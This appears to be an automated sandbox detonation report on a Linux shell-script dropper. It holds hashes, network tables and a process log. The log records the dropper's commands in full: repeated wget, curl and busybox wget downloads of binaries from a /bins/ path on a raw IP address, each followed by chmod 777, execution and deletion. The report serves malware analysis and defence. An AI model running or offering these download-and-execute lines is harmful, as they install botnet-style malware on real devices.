| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 07:02
Reported
2024-11-21 07:04
Platform
debian9-mipsel-20240226-en
Max time kernel
127s
Max time network
132s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | N/A |
| N/A | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | N/A |
| N/A | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | N/A |
| N/A | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | N/A |
| N/A | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | N/A |
| N/A | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | N/A |
| N/A | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | N/A |
| N/A | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | N/A |
| N/A | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | N/A |
| N/A | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | N/A |
| N/A | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | N/A |
| N/A | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | N/A |
| N/A | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | N/A |
| N/A | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | N/A |
| N/A | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | N/A |
| N/A | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | N/A |
| N/A | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | N/A |
| N/A | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | N/A |
| N/A | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | N/A |
| N/A | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | N/A |
| N/A | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | N/A |
| N/A | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | N/A |
| N/A | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | N/A |
| N/A | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | N/A |
| N/A | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | N/A |
| N/A | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | N/A |
| N/A | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | N/A |
| N/A | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | /usr/bin/curl | N/A |
Processes
/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
[/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/chmod
[chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
[./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/rm
[rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/usr/bin/wget
[wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/chmod
[chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
[./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/rm
[rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/usr/bin/wget
[wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/chmod
[chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
[./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/rm
[rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/usr/bin/wget
[wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/chmod
[chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
[./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/rm
[rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/usr/bin/wget
[wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/chmod
[chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
[./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/rm
[rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/usr/bin/wget
[wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/chmod
[chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
[./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/rm
[rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/usr/bin/wget
[wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/chmod
[chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
[./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/rm
[rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/usr/bin/wget
[wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/chmod
[chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
[./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/rm
[rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/chmod
[chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
[./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/rm
[rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/usr/bin/wget
[wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/chmod
[chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
[./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/rm
[rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/chmod
[chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
[./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/rm
[rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/usr/bin/wget
[wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/chmod
[chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
[./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/rm
[rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/usr/bin/wget
[wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/chmod
[chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
[./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/rm
[rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/usr/bin/wget
[wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/chmod
[chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
[./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/rm
[rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/usr/bin/wget
[wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/chmod
[chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
[./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/rm
[rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/usr/bin/wget
[wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/chmod
[chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
[./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/rm
[rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/usr/bin/wget
[wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/chmod
[chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
[./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/rm
[rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/usr/bin/wget
[wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/chmod
[chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
[./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/rm
[rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/usr/bin/wget
